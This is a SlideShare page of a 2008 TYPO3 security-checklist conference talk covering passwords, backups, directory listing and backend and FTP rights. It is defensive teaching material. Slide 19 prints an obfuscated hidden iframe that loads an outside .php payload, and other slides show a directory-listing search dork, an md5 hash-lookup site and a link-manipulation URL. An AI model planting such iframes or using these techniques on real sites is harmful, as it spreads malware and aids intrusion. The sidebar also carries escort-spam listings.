SlideShare uma empresa Scribd logo

Security Checklist for TYPO3

jweiland
jweiland

Security Checklist for TYPO3

Tecnologia
1 de 22
Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
TYPO3 has quite a good security history...
but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
md5.rednoize.com
md5 Hash Lookup
Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
also check for www.domain.com/../system/ not being accessible
database.sql
md5.rednoize.com
Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
FTP Accounts • Only give access to fileadmin/user_upload/...
When crisis strikes...
• „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de
Questions ?

Recomendados

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Cachingjweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Flyjweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applicationsjeff tapper
 

Recomendados

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Cachingjweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Flyjweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applicationsjeff tapper
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operationsDaniel López Jiménez
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example360|Conferences
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Nathan Winters
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get StungBarry Dorrans
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Appsadunne
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with ChefOrlando_Ruby_Users_Group
 
Api Design
Api DesignApi Design
Api Designsumithra jonnalagadda
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Kommons
KommonsKommons
KommonsAntonio Terreno
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli AroJavier Toledo
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)Raviteja Chowdary Adusumalli
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
 
clang-intro
clang-introclang-intro
clang-introHajime Morrita
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 
Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshopjweiland
 

Mais conteúdo relacionado

Semelhante a Security Checklist for TYPO3

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operationsDaniel López Jiménez
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example360|Conferences
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Nathan Winters
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Appsadunne
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 

Semelhante a Security Checklist for TYPO3 (20)

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with Chef
 
Api Design
Api DesignApi Design
Api Design
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Kommons
KommonsKommons
Kommons
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli Aro
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.
 
clang-intro
clang-introclang-intro
clang-intro
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web App
 

Mais de jweiland

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshopjweiland
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting providerjweiland
 
Why RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itWhy RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itjweiland
 
Using TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsUsing TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsjweiland
 

Mais de jweiland (6)

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshop
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider
 
TYPO3 SEO
TYPO3 SEOTYPO3 SEO
TYPO3 SEO
 
Why RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itWhy RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix it
 
Using TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsUsing TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needs
 

Último

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 

Último (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Security Checklist for TYPO3

  • 1. Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
  • 2. TYPO3 has quite a good security history...
  • 3. but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
  • 4. Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
  • 7. Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
  • 8. Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
  • 10.
  • 11.
  • 14.
  • 15. Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
  • 16. FTP Accounts • Only give access to fileadmin/user_upload/...
  • 18. • „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
  • 19. iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
  • 20. Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
  • 21. Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de